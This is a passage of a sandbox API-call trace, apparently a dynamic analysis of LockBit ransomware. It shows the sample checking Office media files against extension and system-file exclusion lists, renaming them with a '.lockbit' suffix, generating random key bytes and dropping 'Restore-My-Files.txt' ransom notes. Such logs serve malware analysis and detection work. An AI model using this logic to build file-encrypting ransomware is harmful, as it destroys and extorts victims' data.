lpString2="J0285360.WMF") returned -1 [0197.502] lstrcmpiW (lpString1="thumbs.db", lpString2="J0285360.WMF") returned 1 [0197.502] lstrcmpiW (lpString1="iconcache.db", lpString2="J0285360.WMF") returned -1 [0197.503] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.503] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285360.WMF") returned=".WMF" [0197.503] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.503] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.503] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.504] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.504] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.504] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.504] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285360.WMF.lockbit") returned 70 [0197.504] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285360.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0285360.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.505] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.505] malloc (_Size=0x40068) returned 0x3df0008 [0197.505] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=30838) returned 1 [0197.505] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.506] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.506] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.506] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.506] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.511] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285360.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285360.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.511] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.511] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.513] free (_Block=0x1fa2ed8) [0197.513] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285360.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.513] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.513] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.513] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd63acb00, ftCreationTime.dwHighDateTime=0x1befd79, ftLastAccessTime.dwLowDateTime=0xbd5d1680, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd63acb00, ftLastWriteTime.dwHighDateTime=0x1befd79, nFileSizeHigh=0x0, nFileSizeLow=0x30e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0285410.WMF", cAlternateFileName="")) returned 1 [0197.513] lstrcmpiW (lpString1=".", lpString2="J0285410.WMF") returned -1 [0197.513] lstrcmpiW (lpString1="..", lpString2="J0285410.WMF") returned -1 [0197.513] PathFindExtensionW (pszPath="J0285410.WMF") returned=".WMF" [0197.513] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.513] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.513] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.513] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.513] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.513] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.513] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.514] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.514] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0285410.WMF") returned 1 [0197.515] lstrcmpiW (lpString1="ntldr", lpString2="J0285410.WMF") returned 1 [0197.515] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0285410.WMF") returned 1 [0197.515] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0285410.WMF") returned -1 [0197.515] lstrcmpiW (lpString1="autorun.inf", lpString2="J0285410.WMF") returned -1 [0197.515] lstrcmpiW (lpString1="thumbs.db", lpString2="J0285410.WMF") returned 1 [0197.515] lstrcmpiW (lpString1="iconcache.db", lpString2="J0285410.WMF") returned -1 [0197.515] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.515] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285410.WMF") returned=".WMF" [0197.515] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.515] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.515] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.516] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.516] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285410.WMF.lockbit") returned 70 [0197.516] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285410.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0285410.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.518] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.518] malloc (_Size=0x40068) returned 0x3df0008 [0197.518] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=12516) returned 1 [0197.518] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.519] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.519] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.519] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.519] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.523] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285410.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285410.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.524] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.524] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.525] free (_Block=0x1fa2ed8) [0197.525] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285410.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.525] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.525] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.525] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97d5a00, ftCreationTime.dwHighDateTime=0x1befd7a, ftLastAccessTime.dwLowDateTime=0xbd5d1680, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x97d5a00, ftLastWriteTime.dwHighDateTime=0x1befd7a, nFileSizeHigh=0x0, nFileSizeLow=0x2448, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0285444.WMF", cAlternateFileName="")) returned 1 [0197.525] lstrcmpiW (lpString1=".", lpString2="J0285444.WMF") returned -1 [0197.525] lstrcmpiW (lpString1="..", lpString2="J0285444.WMF") returned -1 [0197.526] PathFindExtensionW (pszPath="J0285444.WMF") returned=".WMF" [0197.526] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.526] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.527] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.527] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0285444.WMF") returned 1 [0197.527] lstrcmpiW (lpString1="ntldr", lpString2="J0285444.WMF") returned 1 [0197.527] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0285444.WMF") returned 1 [0197.527] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0285444.WMF") returned -1 [0197.527] lstrcmpiW (lpString1="autorun.inf", lpString2="J0285444.WMF") returned -1 [0197.527] lstrcmpiW (lpString1="thumbs.db", lpString2="J0285444.WMF") returned 1 [0197.527] lstrcmpiW (lpString1="iconcache.db", lpString2="J0285444.WMF") returned -1 [0197.527] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.527] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285444.WMF") returned=".WMF" [0197.528] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.528] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.528] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.529] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285444.WMF.lockbit") returned 70 [0197.529] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285444.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0285444.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.531] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.531] malloc (_Size=0x40068) returned 0x3df0008 [0197.531] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9288) returned 1 [0197.531] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.531] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.531] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.532] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.532] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.538] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285444.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285444.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.538] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.538] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.538] free (_Block=0x1fa2ed8) [0197.538] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285444.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.538] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.538] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.538] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d3c7300, ftCreationTime.dwHighDateTime=0x1befd7b, ftLastAccessTime.dwLowDateTime=0xbd5d1680, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5d3c7300, ftLastWriteTime.dwHighDateTime=0x1befd7b, nFileSizeHigh=0x0, nFileSizeLow=0x2a12, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0285698.WMF", cAlternateFileName="")) returned 1 [0197.538] lstrcmpiW (lpString1=".", lpString2="J0285698.WMF") returned -1 [0197.538] 